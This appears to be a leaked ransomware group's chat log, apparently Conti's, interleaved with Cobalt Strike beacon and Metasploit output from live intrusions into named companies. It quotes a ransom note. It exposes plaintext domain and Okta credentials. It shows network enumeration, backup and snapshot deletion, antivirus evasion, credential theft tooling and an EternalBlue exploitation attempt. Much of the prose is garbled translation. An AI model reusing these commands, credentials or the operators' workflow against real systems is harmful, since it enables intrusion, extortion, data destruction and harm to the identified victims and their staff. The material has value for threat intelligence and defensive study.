 930b     fil     01/19/2021 16:52:06   readme.txt
```
```
beacon> ls C:\
[*] Tasked beacon to list files in C:\
[+] host called home, sent: 20 bytes
[*] Listing: C:\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     04/24/2014 10:17:32   $AVG
          dir     05/05/2014 14:50:25   $Recycle.Bin
          dir     01/13/2021 00:36:32   $WinREAgent
          dir     03/11/2014 14:27:30   _FedEx
          dir     04/12/2013 16:26:21   BIN
          dir     06/13/2015 09:33:14   bootdrv
          dir     06/13/2015 09:33:13   CMCLanDesk
          dir     01/15/2021 17:30:47   Config.Msi
          dir     12/01/2020 12:12:25   CounterPoint SQL Tutorials
          dir     01/19/2021 10:17:28 PM   CPAccounting
          dir     04/03/2013 14:41:34   dell
          dir     07/14/2009 00:08:56   Documents and Settings
          dir     03/10/2014 13:00:44   Drivers
          dir     01/24/2018 11:46:42   HP_Color_LaserJet_Pro_MFP_M477
          dir     02/28/2014 15:46:04   HP_ePrint
          dir     10/07/2013 16:59:18   HP_ePrint_Mobile
          dir     03/04/2014 10:55:01   HP_LJ300-400_color_MFP_M375-M475
          dir     10/07/2013 16:53:39   HP_LJM425_scan_upgrade_11_1
          dir     07/23/2020 22:10:48   inetpub
          dir     06/23/2016 08:37:33   Intel
          dir     04/27/2016 01:35:59   Logs
          dir     02/28/2018 10:34:09   MATS
          dir     12/07/2019 03:14:52   PerfLogs
          dir     07/23/2020 22:38:46   Program Files
          dir     09/10/2020 11:54:42   Program Files (x86)
          dir     07/24/2020 09:52:37   ProgramData
          dir     07/23/2020 20:07:22   Recovery
          dir     03/26/2013 05:21:53   System Recovery
          dir     01/18/2021 19:16:12   System Volume Information
          dir     02/28/2014 15:06:33   Temp
          dir     07/23/2020 19:44:04   Users
          dir     01/13/2021 01:04:40   Windows
          dir     10/04/2016 11:30:40   WindowsUpdates Batch files
 1kb      fil     01/19/2021 16:52:06   .rnd.WSFWM
 535b     fil     01/19/2021 16:52:06   BOOTNXT.WSFWM
 28kb     fil     01/18/2021 16:52:06   dell.sdr.WSFWM
 8kb      fil     01/18/2021 09:15:14   DumpStack.log.tmp
 0b       fil     06/21/2013 12:57:16
 6mb      fil     04/12/2013 16:27:45   FSMMSILog.txt
 5gb      fil     01/18/2021 09:15:12   hiberfil.sys
 476kb    fil     01/05/2002 03:40:20   msvcp70.dll
 336kb    fil     01/05/2002 03:37:28   msvcr70.dll
 8gb      fil     01/18/2021 09:15:14   pagefile.sys
 930b     fil     01/19/2021 16:52:06   readme.txt
 256mb    fil     01/18/2021 09:15:14   swapfile.sys
 1kb      fil     01/16/2015 12:21:09   tcg quaterly run.txt

beacon> shell dir C:\readme.txt
[*] Tasked beacon to run: dir C:\readme.txt
[+] host called home, sent: 48 bytes
[+] received output:

 Volume in drive C is OS
 Volume Serial Number is B825-1C82

 Directory of C:\

01/19/2021  04:52 PM               930 readme.txt
               1 File(s)            930 bytes
               0 Dir(s)  842,931,138,560 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:

All of your files are currently encrypted.
Backups were encrypted or deleted, same as Shadow Copies.
If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.
To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge.
The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website: TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.best ---BEGIN ID--- TZhuHwa9cdqOe3RnHObcHHHJFFVZUjBpwFXziFQud63TrrrLqJ3ikFUXJn1BfjYF ---END ID--- ``We have to cut off the av and restart it. DressinGaudy\canton GMC041985 DressinGaudy\corporate GCouture DressinGaudy\DG108 Gaudy081 DressinGaudy\jmr 1515sasy DressinGaudy\ROOK RR#2212 DressinGaudy\DG102 Gaudy021 DressinGaudy\GM103 Gaudy031 DressinGaudy\tim true0407 DressinGaudy\DG105 Gaudy051 DressinGaudy\GCPOS8A-TGM1 Password1 DressinGaudy\GM106 Gaudy061 DressinGaudy\GCPOS5A-LGM3 register ``Disconnect the micro)`` Yes, I already pulled[ ](https://mediaeveryone.com/group/gaudyme-com?msg=6biKzY5QiYNKbKihb) try to unshare the c$``. 172.16.1.247:7680 172.16.1.247:6783 172.16.1.247:5357 172.16.1.247:5040 172.16.1.247:2107 172.16.1.247:2105 172.16.1.247:2103 172.16.1.247:1801 172.16.1.247:139 172.16.1.247:135 172.16.1.247:80 172.16.1.247:445 (platform: 500 version: 10.0 name: ACCOUNTING2 domain: DRESSINGAUDY) ``Trend Micro Inc. should be shut down for an av[ ](https://mediaeveryone.com/group/gaudyme-com?msg=MtM65JGes69QGu2ov) ``what av? if another process won't jump into c$-but they were dropping out after 10-15 seconds-sessions, so I'm pulling wmic - rpc server is unavailable do remote-exec psexec - everything okily you about psex?[ ](https://mediaeveryone.com/group/gaudyme-com?msg=q83XW27j2ohmjkmLC) ??? and rpc open? it works psex? 
strange that rpc does not work
```
Teemo[GAUDY-DC2]SYSTEM */2580|2021Jan20 01:33:12> shell net view \\172.16.1.247 /all
[*] Tasked beacon to run: net view \\172.16.1.247 /all
[+] host called home, sent: 59 bytes
[+] received output:

Shared resources at \\172.16.1.247

Share name  Type  Used as  Comment

-------------------------------------------------------------------------------
IPC$        IPC            Remote IPC
print$      Disk           Printer Drivers
The command completed successfully.
```
rpc doesn't work at all
rpc on the first one works?
Accounting2.DressinGaudy.local: 172.16.1.247 (on disk access says no name found)
Label.DressinGaudy.local: 172.16.1.61 (is)
DGW-PC.DressinGaudy.local: 172.16.1.83 (is)
Gaudy-DC2.DressinGaudy.local: 169.254.32.72 (is)
GAUDY-RDP1.DressinGaudy.local: 172.16.1.15 (is the same computer as above)
Gaudy-DC2.DressinGaudy.local: 169.254.113.11 (is the same computer as the above two)
Gaudy-DC2.DressinGaudy.local: 169.254.196.198 (is the same computer as the three above)
Gaudy-DC2.DressinGaudy.local: 172.16.1.15 (is the same computer as the four above)
GM-Tyler-Office.DressinGaudy.local: 192.168.1.103 (is)
MikaDesktop.DressinGaudy.local: 192.168.2.149 (is)
And there were 7 (5), how many total pc's?
```
[*] Listing: C:\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     01/19/2021 16:18:48   $GetCurrent
          dir     11/02/2020 15:50:17   $Recycle.Bin
          dir     01/19/2021 16:18:49   $SysReset
          dir     01/19/2021 16:18:49   $WinREAgent
          dir     01/19/2021 16:18:52   _FedEx
          dir     01/19/2021 16:18:49   AMD
          dir     01/19/2021 16:18:49   ATI
          dir     01/19/2021 16:18:49   DG
          dir     07/14/2009 00:08:56   Documents and Settings
          dir     01/19/2021 16:18:50   ESD
          dir     01/19/2021 16:18:50   FedEx
          dir     01/19/2021 16:18:50   Logs
          dir     01/19/2021 16:18:50   MSOCache
          dir     01/19/2021 16:18:51   New Pics
          dir     12/07/2019 03:14:52   PerfLogs
          dir     01/19/2021 16:18:51   Program Files
          dir     01/19/2021 16:18:51   Program Files (x86)
          dir     01/19/2021 16:18:51   ProgramData
          dir     01/19/2021 16:18:51   Recovery
          dir     01/19/2021 16:18:44   System Volume Information
          dir     02/02/2015 15:03:13   temp
          dir     01/19/2021 16:18:52   Users
          dir     01/19/2021 14:41:20   Windows
          dir     12/06/2019 09:34:02   Windows10Upgrade
 1kb      fil     01/19/2021 16:18:48   .rnd.WSFWM
 535b     fil     01/19/2021 16:18:48   BOOTNXT.WSFWM
 947kb    fil     01/19/2021 16:18:48   count_log_out.txt.WSFWM
 8kb      fil     01/13/2021 02:10:14   DumpStack.log.tmp
 7mb      fil     01/19/2021 16:18:48   FSMMSILog.txt.WSFWM
 11gb     fil     01/13/2021 02:10:10   hiberfil.sys
 883kb    fil     12/01/2006 22:37:14   msdia80.dll
 15gb     fil     01/13/2021 02:10:14   pagefile.sys
 1kb      fil     01/19/2021 16:18:48   SOCIAL-MEDIIA1.txt.WSFWM
 34b      fil     09/26/2016 11:55:16   Start Windows Updates.bat
 32b      fil     09/26/2016 11:54:46   Stop Windows Updates.bat
 256mb    fil     01/13/2021 02:10:14   swapfile.sys
```

Leaving the files encrypted, why does he not leave a note more? Are we ok?

There are no disks as if there is no account, but the hostnames are all there, I pinged all the rest?

All 5 machines are pulled, all ready?
Is everything ready?

1TB - delete in 5 minutes.

My screenshot above is exactly all there is, delete snaps, etc.

Read all what is there and so what is complete?

Still do completely) files that are in 2013-2015 terabyte drive and default login password. it is doubtful that something good was there. QNAP Turbo NAS

only find us, there is one server and half of the company, I think the files will not collect, here under 0 can you close? I think all here

user9 user4 @tl1

Give everyone here) avsix.com nothing pulls there some nonsense

user7 should be @user7

@user3 is busy here with @user3 let's go to random whatever you want to help?
> on all of them

yes sniper gave

> [-] Invoke_3 on EntryPoint failed.

then research admins) or uzakili adminroot there's a passthrough there passvot clears yes by the way

```
[-] Invoke_3 on EntryPoint failed.
```
```
192.168.2.164 - did not open
172.16.1.11  - avaya, telephony
172.16.1.20  - canon iR-ADV C2225i
172.16.1.22  - HP LaserJet M402n
172.16.1.58  - HP OfficeJet Pro 8710
172.16.1.14  - us, qnap
```

There's a hell of a lot of trouble,

Scan to 445 and to the web their sabnetsaha also noticed such a man is
3 in quotation marks is

```
GAUDY-RDP1.DressinGaudy.local
Gaudy-DC2.DressinGaudy.local
"Gaudy-DC1.DressinGaudy.local"
```

1 and 2 on the same IP

"3"

```
Destination host unreachable.
```

It's not "3" servers and by the way don't keep one session if it's dropping... so go somewhere else to rerisk it, there was such a thing last time

> request ad_ous or ad_group - the session crashes ignore them or reset?

probably clean the toolspanel last time also reset and what do you do? right? i'll reset dsink, hell, check again for backups and can close in principle, if the latter is not detected at once does not work, dohhhDA

DressinGaudy.local

update info to net domain DGW-PC? let's silkcodnoe koba that's not there I think I put in a long slip do you have a session here?
need to check the ping as far as I remember there are no backups at all it just get injected so you could then close @user8 call you so there's a small fucked up grid and it should be, but here is a couple
Add users has no direct domain without a .local

3 server and how should I know?) why laba then? because we never understood @tl2 is laba or not?

https://vmblog.ru/sbros-paroyal-root-v-vmware-esxi/ Is there a way to reset a password in the sphere? in the serviceenu the root password, maybe this account is used somewhere and how it can fall down?

I think that if the network does not fall down, then it may be worth just resetting passwords from the sphere on the icesxxes in crisp, not much so far looking for icesx cres, they only go there via cc, passwords are not stored (in general I think that if the network does not fall down, then it is really worth it to reset the passwords on the icesxxes also, it is possible that something started backing up in amazon backup, because there was an icon on the desktop of the admin vobechel pochekal its email, he writes part of the servers restored and some could not, went to a link from the note) And on some servers have put kaspersky anti-ransomware tool

what progress?
not today, rebound @tl1

what about new sessions?

DecryptPwd seems to yank from the path, if not confused look it up putty HKCU\Software\SimonTatham\PuTTY\Sessions recursive search for *.ppk up to 3rd level in %USERPROFILE%\Documents %USERPROFILE%\.ssh %USERPROFILE%\Downloads HKCU\Software\SimonTatham\PuTTY\Sessions

but 2 minnu it doesn't retrieve passwords as far as i know there's a psh script on gita but it doesn't work is there anything to get passwords or sessions from putty? except goferok JR

after 8 new sessions came up, thanks a lot but the builds are fresh on gita is there a latest version of mimic? while deafshelcode

yes, come on she

> there is an article how on esh from sphere reset the ruth password not in the kurseda by the way, balimore are back Beremore have sessions TL2 will be today? I wanted to ask him, maybe something washed up on the cessation of televisa?

there's an article on how to reset the root password from the sphere it may be worth a try? or the virtuals will fall down? there are sessions while i monitor the admin need to look for eshs what are you doing?
```
Force user logoff how long after expires?:       Never
Minimum password age (days):                     1
Maximum password age (days):                     90
Minimum password length:                         7
Length of password history maintained:           12
Lockout threshold:                               5
Lockout duration (minutes):                      30
Lockout observation window (minutes):            30
Computer role:                                   WORKSTATION
```

LA
```
Administrator
UNIVERSE\Domain Admins
UNIVERSE\ITHelper-STC
UNIVERSE\SystemServiceAccounts
```

not everyone can see each other either,

Wilsonart.com srv: 141 arm: 2587

the small ones see each other?

```
The trust relationship between the primary domain and the trusted domain failed.
```

See one large domain? Domains BEFORE 30 servers. Number of Computers by AD:
```
Wilsonart.com       srv: 141  arm: 2587
uk.Wilsonart.com    srv: 25   arm: 157
eu.Wilsonart.com    srv: 43   arm: 10
uk.Wilsonart.com    srv: 1
WI.RWP.COM          srv: 60   arm: 515
TECHNISTONE.LOCAL   srv: 42   arm: 253
SLF.LOCAL           srv: 10   arm: 66
resopal.lan         srv: 27   arm: 100
ralpwilson.com      srv: 1
polyrey.net         srv: 64   arm: 340
BUSHBOARD.CO.UK     srv: 17   arm: 136
arborite.com        srv: 12   arm: 154
```

give status on domains how many pc's and servers

ostalnym sees the head domain does not see the two domains we have a domain that sees everything? I don't know Tl2 says it can, so maybe if you can share drives they will see? I honestly have a hard time with the point that the software itself knows how to identify disks in europe We need to discuss what to do with such a large network What to do with armas?
we want to ping that pings there is a scpreet that searches all drives and important processes and from the servers the cipher will reach the armies And then we ping the armies.

```
>dNSHostName: VIPW7700.resopal.lan
>description: virtuell auf VMware (Win 10)
172.22.198.250:22 (SSH-2.0-U_fcWc)
```

sek @tl2 @tl1 mozhno etot pls

There is one, european yes with processes kipassatachka found? no password was there? I took out of the mail in memory? password is required? no) and you opened it? can we do something with kipass .kdbx? though no, bullshit aiipshniki like what from where and why?

1) in the america snaps they do not seem to store, back them up and delete them immediately there is access to snapshots nadov eu, if it is on the winndea is there any point in looking for the creed from the spherenay for which spasnu I wrote 2 and 3

1 no

@tl1

Second

.yes, what else do you need?
The last one is who

this one on kmd5 also passed

eu.wilsonart.com

resopal.lan
The second and the last one on kmd5 passed

Maybe the clears from 2 and 3

CN=Admin_VCENTER - there is one dk and that's it, on going to the site here is this horror from 2003 in two domains, in ad comp only dk, no comps, no servers there are subnets - 445 gives out comps from the main domain are these some planned / test domains? snapshots are made, exported to backup and deleted backups are stored on winserv)

this one

Eyes in a bunch

I'm not @tl2, but I'll throw in

@tl2, send me the hash

sphere
`````` setg Proxies socks4:199.127.61.214:1488 ``170.7.76.79esx ``` drpvw01.wilsonart.com ``another sphere ``` dcvcsa01.wilsonart.com `````` >description: VMware vCenter 6.0 Server >operatingSystem: Windows Server 2012 R2 Datacenter >dNSHostName: dcwas79.Wilsonart.com Share name Type Used as Comment ---------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share D$ Disk Default share IPC$ IPC Remote IPC >description: Veeam Backup Server >operatingSystem: Windows Server 2016 Standard >dNSHostName: dcveeam01.Wilsonart.com Share name Type Used as Comment ---------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC >description: Symantec End Point Management Server >operatingSystem: Windows Server 2012 Standard >dNSHostName: DCWAS45.Wilsonart.com Share name Type Used as Comment ------------------------------------------ ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC print$ Disk Printer Drivers >description: PROD Symantec AntiVirus Management Server >operatingSystem: Windows Server 2012 Standard >dNSHostName: FLWAS03.Wilsonart.com net view \FLWAS03.Wilsonart.com /all System error 53 has occurred. The network path was not found. Ping statistics for 170.7.20.198: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 170.7.20.198:53161 170.7.20.198:49154 170.7.20.198:49153 170.7.20.198:9090 170.7.20.198:8446 170.7.20.198:8445 170.7.20.198:8443 170.7.20.198:8014 170.7.20.198:8008 170.7.20.198:8006 170.7.20.198:5985 170.7.20.198:5060 170.7.20.198:3389 170.7.20.198:2000 170.7.20.198:1611 170.7.20.198:1610 170.7.20.198:1100 170.7.20.198:143 170.7.20.198:139 170.7.20.198:135 170.7.20.198:110 170.7.20.198:80 170.7.20.198:25 170.7.20.198:21 >description: Vcenter Server >dNSHostName: bod01-vce01.eu.wilsonart.com net view \bod01-vce01.eu.wilsonart.com /all System error 53 has occurred. The network path was not found. 
Ping statistics for 10.40.60.70: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), 10.40.60.70:9443 10.40.60.70:9087 10.40.60.70:9084 10.40.60.70:8084 10.40.60.70:8008 10.40.60.70:7444 10.40.60.70:5580 10.40.60.70:5480 10.40.60.70:5060 10.40.60.70:2020 10.40.60.70:2015 10.40.60.70:2014 10.40.60.70:2012 10.40.60.70:2000 10.40.60.70:1514 10.40.60.70:636 10.40.60.70:514 10.40.60.70:443 10.40.60.70:389 10.40.60.70:110 10.40.60.70:88 10.40.60.70:80 10.40.60.70:25 10.40.60.70:21 >description: Veeam Backup Server >operatingSystem: Windows Server 2016 Standard >dNSHostName: bod01-bkp01.eu.Wilsonart.com Share name Type Used as Comment ---------------------------------------------- ADMIN$ Disk Remote Admin C$ Disk Default share D$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC R$ Disk Default share V$ Disk Default share veeam_agent_ISOs Disk W$ Disk Default share X$ Disk Default share >dNSHostName: nas_signature.polyrey.net Share name Type Used as Comment ------------------------------------------------ Archives_Outlook Disk Astier Disk CALDERA_RIPS Disk Depot Disk Design Library Disk INFO Disk IPC$ IPC IPC Service () PROJETS_Signature Disk Signature_PAO Disk TEST_JFC Disk Users_Archives Disk Users_Archives 172.25.168.64:6281 172.25.168.64:5001 172.25.168.64:5000 172.25.168.64:548 172.25.168.64:443 172.25.168.64:139 172.25.168.64:80 172.25.168.64:445 (platform: 500 version: 6.1 name: NAS_SIGNATURE domain: POLYREY) >description: virtuell auf VMware (Win 10) >operatingSystem: Windows 10 Pro >dNSHostName: VIPW7700.resopal.lan net view \VIPW7700.resopal.lan /all Systemfehler 53 aufgetreten. Der Netzwerkpfad wurde nicht gefunden. Antwort von 172.22.198.250: Zielhost nicht erreichbar. 
Ping-Statistik für 172.22.190.190: Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0 (0% Verlust), 172.22.198.250:541 172.22.198.250:443 172.22.198.250:22 (SSH-2.0-U_fcWc) >operatingSystem: Windows 7 Professional >dNSHostName: BBBACKUP.bushboard.co.uk Ping request could not find host BBBACKUP.bushboard.co.uk. Please check the name and try again. >description: Backup Server >operatingSystem: Windows Server 2012 Datacenter >servicePrincipalName: MSSQLSvc/BBBK01.bushboard.co.uk:VEEAMSQL2012 >dNSHostName: BBBK01.bushboard.co.uk Ping statistics for 2002:c001:147::c001:147: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), >operatingSystem: Windows Server 2012 Datacenter >servicePrincipalName: MSSQLSvc/testmove.bushboard.co.uk:VEEAMSQL2012 >dNSHostName: testmove.bushboard.co.uk Ping statistics for 2002:c001:15c::c001:15c: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), >operatingSystem: Windows Server 2016 Standard >servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2012 >servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2016 >dNSHostName: BBDC03.bushboard.co.uk Share name Type Used as Comment ------------------------------------------------------------------------------- ADMIN$ Disk Remote Admin Bushboard Backups Disk C$ Disk Default share E$ Disk Default share F$ Disk Default share IPC$ IPC Remote IPC iTop-2.6.1-4463 Disk log Disk SQL_Server Disk U$ Disk Default share UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system. VBRCatalog Disk vCenterBackups Disk WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system. WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance. 
>operatingSystem: unknown >dNSHostName: ltn01-vcenter01.bushboard.co.uk Ping statistics for 2002:c001:111::c001:111: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), >operatingSystem: Windows 10 Pro >dNSHostName: NB-AsemBackup.technistone.local >User: adm-cavailj - IP Address: 172.25.168.113 `User: petersm2 - IP Address: 170.7.76.192```` adm-cavailj adm-GrelleS Administrator alexanm bmccm fowlerh lucase moorer2 owensd petersm2 polyreyadmin roeders solarwindsarm.svc vyombmccm `````` Alias name administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator sysadmin ZOHOCORP\raja-9298 The command completed successfully. The request will be processed at a domain controller for domain csez.zohocorpin.com. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- Administrator pmpdemo rmp The command completed successfully. The request will be processed at a domain controller for domain csez.zohocorpin.com. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator adssp assetprober desktopcentral gjprabu-0985 kamal-0150 nocfw sysadmin sysaudit vijay-3486 zohoits The command completed successfully. 
``open as xls`` Resource Name User Account Password anand1 acc1 test1_%#@ anand1 aa aa z$ZMGxCAewr8Z Gun as p7 portscan 192.168.16.0/24 23,22,80,1433,135,445,3389,5900 [*] Tasked beacon to scan ports 23,22,80,1433,135,445,3389,5900 on 192.168.16.0/24 [+] host called home, sent: 74813 bytes [+] received output: Scanner module is complete beacon> portscan 192.168.16.0/24 [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 192.168.16.0/24 [+] host called home, sent: 74813 bytes [+] received output: Scanner module is complete ``exactly))`` double space bar try to remove the double space bar really started, although I'm sure it gave an error.... but ok `execute-assembly /home/user/Desktop/TOOLS/1/Rubeus.exe monitor /interval:1` - does not want to work and gives help. is there anything you can do about it? hmm. now it weighs230 kilobytes it is heavier than 1M for fileless execution and why do you drop it?i need to run rubus and AV kills it as soon as i drop it in my mind yes, what's wrong with dll? @tl2 do we have a way to pack the exe file so it won't get killed by AV? `Win 7 Pro ``` svembu.localzoho.com [172.20.3.7] zcpl-wine6420.localzoho.com [172.20.3.7] rex-0179.localzoho.com [172.20.3.7] oorni-3055.localzoho.com [172.20.3.7] vijaya-dr1.localzoho.com [172.20.3.7] srini-1728.localzoho.com [172.20.3.7] zforms-w7-64-1.localzoho.com [172.20.3.7] abrar--4885.localzoho.com [172.20.3.7] mohammed-con127.localzoho.com [172.20.3.7] mohan-2271-temp.localzoho.com [172.20.3.7] integ-wiin7.localzoho.com [172.20.3.7] sivanandam-2729.localzoho.com [172.20.3.7] integ-win7-1-bc.localzoho.com [172.20.3.7] integ-win7-1.csez.zohocorpin.com [192.168.113.57] integ-win7-2.csez.zohocorpin.com [192.168.113.71] tmrm-compliance.csez.zohocorpin.com [192.168.225.179] ``would need to specify domain sbmuser sbmdomain sbmpassprice... it's strange that it's vulnerable...but here you probably need a credentials... 
[*] 192.168.113.242:445 - Target OS: Windows 10 Pro 10586 [-] 192.168.113.113.242:445 - Unable to find accessible named pipe! [*] 192.168.113.113:242:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``would ms17_010_command not use@tl2 any ideas? ``` msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] 192.168.113.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.113.242:445 - Host is probably VULNERABLE to MS17-010! - Windows 10 Pro 10586 x64 (64-bit) [*] 192.168.113.113:242:445 - Scanned 1 of 1 hosts (100% complete) [*] 192.168.113.242:445 - Connecting to target for exploitation. [+] 192.168.113.113:242:445 - Connection established for exploitation. [+] 192.168.113.113:242:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.113.113:242:445 - CORE raw buffer dump (20 bytes) [*] 192.168.113.113.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 31 Windows 10 Pro 1 [*] 192.168.113.242:445 - 0x00000010 30 35 38 36 0586 [+] 192.168.113.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.113.113.242:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.113.113.242:445 - Sending all but last fragment of exploit packet [-] 192.168.113.242:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30) [*] Started bind TCP handler against 192.168.113.242:4444 [*] Exploit completed, but no session was created. 
msf6 exploit(windows/smb/ms17_010_eternalblue) > ````Win Serv 2008 R2` ``` win2k8adc.localzoho.com [172.20.3.7] vcenter.localzoho.com [172.20.3.7] print-server-bk.localzoho.com [172.20.3.7] hpacc-control.localzoho.com [172.20.3.7] printserver.csez.zohocorpin.com [192.168.100.206] est-it-storage.csez.zohocorpin.com [192.168.100.74] est-av-server.csez.zohocorpin.com [192.168.100.68] finance-server.csez.zohocorpin.com [192.168.112.132] integ-i18n.csez.zohocorpin.com [192.168.113.56] tally-server.csez.zohocorpin.com [192.168.206.51] ``Well, there's one already. then on 17-010 to scan vin2008 servers is still quite possible and the second one ``` beacon> shell ping INTEG-DRBD-XP64 [*] Tasked beacon to run: ping INTEG-DRBD-XP64 [+] host called home, sent: 51 bytes [+] received output: Pinging integ-drbd-xp64.csez.zohocorpin.com [192.168.113.49] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 192.168.113.49: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), ``One. ``` beacon> shell ping INTEG-XP1 [*] Tasked beacon to run: ping INTEG-XP1 [+] host called home, sent: 45 bytes [+] received output: Pinging integ-xp1.csez.zohocorpin.com [192.168.113.58] with 32 bytes of data: Reply from 192.168.113.58: bytes=32 time=8ms TTL=62 Reply from 192.168.113.58: bytes=32 time=8ms TTL=62 Reply from 192.168.113.58: bytes=32 time=8ms TTL=62 Reply from 192.168.113.58: bytes=32 time=8ms TTL=62 Ping statistics for 192.168.113.58: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 8ms, Maximum = 8ms, Average = 8ms ``There's still no XP exploit working so why don't you try 17-010 ? XP Professional is and 2012 R2 is 2008 R2-AD has no 2003 / XP cars ? Just nothing else comes to mind but it's hardly a good idea ... big network, brute-force here.... maybe try a list of domain admins@tl1 Maybe brute-force the top passwords? 
Minimum password length: 8 Length of password history maintained: 3 Lockout threshold: 15 Lockout duration (minutes): 15 ``Describe progress to the workgroupswiden signed by @user8`LP-BC8DTT2 what was the pk name? or polzakwosupply.comdesire2learn.com user:jguerrero bigassfans.com user:lmmoore which ones are dead? can i get into wsndomain.com? both networks are dead the rest are dead no i have 1 how many networks with YES? how many or how many of each? yes, mine is back working with it check the input cobu i got 30 silencershop.com in the same groups the rest of you who are working write down progress who wrote down dead sessions in groups, wait 20 minutes write in groups that need to reopencreatecreated[ ](https://mediaeveryone.com/channel/general?msg=BTTw8up58goy7kT7E) go to the site - d2l.com[ ](https://mediaeveryone.com/channel/general?msg=TNJMxWoAgagW66y9j) yes URL : https://wosupply.okta.com/ Username : bert.engeron@wosupply.com Password : Summer2019 ``` i think this is the real domaindesire2learn.com I just downloaded it, what is the real domain of the group? @tl1ad_user_desireln.d2lvv taken+1 free see? 
I can't see it, I've already created a confu >userPrincipalName: *davidw@dvdempire.lan >objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=dvdempire,DC=lan >dSCorePropagationData: 16010101000000.0Z >lastLogonTimestamp: 132467236873201585 >textEncodedORAddress: X400:C=us;A= ;P=DVD Empire;O=Exchange;S=Walter;G=David;I=M; *>mail: davidw@dvdempire.com ````dvdempire.lan ``dvdempire.com```` >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@sugarinstant.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@tlagay.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@popporn.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@digiflixxx.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempiredistributing.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@pornstarempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@ravanallc.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirestore.net >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@dekkoo.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempirefilms.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirestores.co >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@adultempirecash.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@whackoffer.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@useddvdempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@blackholeboards.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bedroomadvisor.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bargainadultdvd.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@strangespin.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@bluedoor.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@rentals.goodvibes.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@vivid.dvdempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@spicetvstore.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@arraydisplays.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@it.dvdempire.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@empirebase.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@sixflavors.com >proxyAddresses: smtp:GFIME_MOVEEXCH_USER@uencode.net 
